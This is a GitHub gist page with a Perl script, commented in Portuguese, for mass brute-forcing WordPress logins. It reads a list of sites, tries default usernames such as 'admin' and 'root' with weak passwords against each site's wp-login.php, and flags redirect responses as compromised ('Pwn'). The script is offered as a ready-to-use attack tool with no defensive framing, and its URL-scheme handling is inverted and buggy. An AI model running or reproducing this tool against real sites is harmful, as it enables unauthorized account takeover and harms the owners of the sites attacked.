Skip to content

Instantly share code, notes, and snippets.

@v4p0r

v4p0r/Simples Mass WP Brute

Last active October 15, 2017 20:33
Show Gist options
  • Save v4p0r/164529019167a10bf64eaa7444825c7b to your computer and use it in GitHub Desktop.
Save v4p0r/164529019167a10bf64eaa7444825c7b to your computer and use it in GitHub Desktop.
Download ZIP
forget the world
Raw
Simples Mass WP Brute
#!/usr/bin/perl
# Simples Mass WP Brute
# Coder by v4p0r
# Date: 15 OUT 2017 18:22
# Greetz: YC - HighTech - EOF Club - Cater - Strike - d3z3n0v3 - all friends
# modúlos usado
use strict;
use LWP::UserAgent;
print "Simples Mass WP Brute\n".
"Criado por v4p0r\n\n";
# Declarando umas váriveis
my ($site, @splitar);
print "[Insira sua lista]: ";
chomp(my $file = <STDIN>);
open (my $sitesone ,'<', $file);
my @sites = <$sitesone>;
# Definindo user e pass padrões wp, podendo ser alterado
my @users = ("admin", "root", "editor","master");
my @password = ("admin", "root", "master", "admin123", "123", "123456789", "editor123");
# Abrindo arquivos para splitar
foreach $site (@sites) {
foreach my $user (@users) {
foreach my $pass (@password) {
push @splitar, "$site |$user|$pass";
}
}
}
# Loop / Split and Check
foreach my $splitar1 (@splitar) {
my ($site,$usuario,$senha) = split/[|]/,$splitar1;
if ($site !~ /^http:\/\//) {
$site = "http://" . $site;
} else {
$site = "https://" . $site;
}
if ($site !~ /\/wp-login.php/) {
$site = $site . "/wp-login.php";
}
my $useragent = new LWP::UserAgent;
my $resposta = $useragent->post($site,
{ log => $usuario,
pwd => $senha,
'wp-submit' => "Log in",
});
my $cracked = $resposta->code;
print "[+] Testando => Site: " .$site. " User: " .$usuario. " Senha: " .$senha. "\n";
if($cracked == 302){
print "\n[*] Pwn: " .$site. " | " .$usuario. " | " .$senha. "\n\n";
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment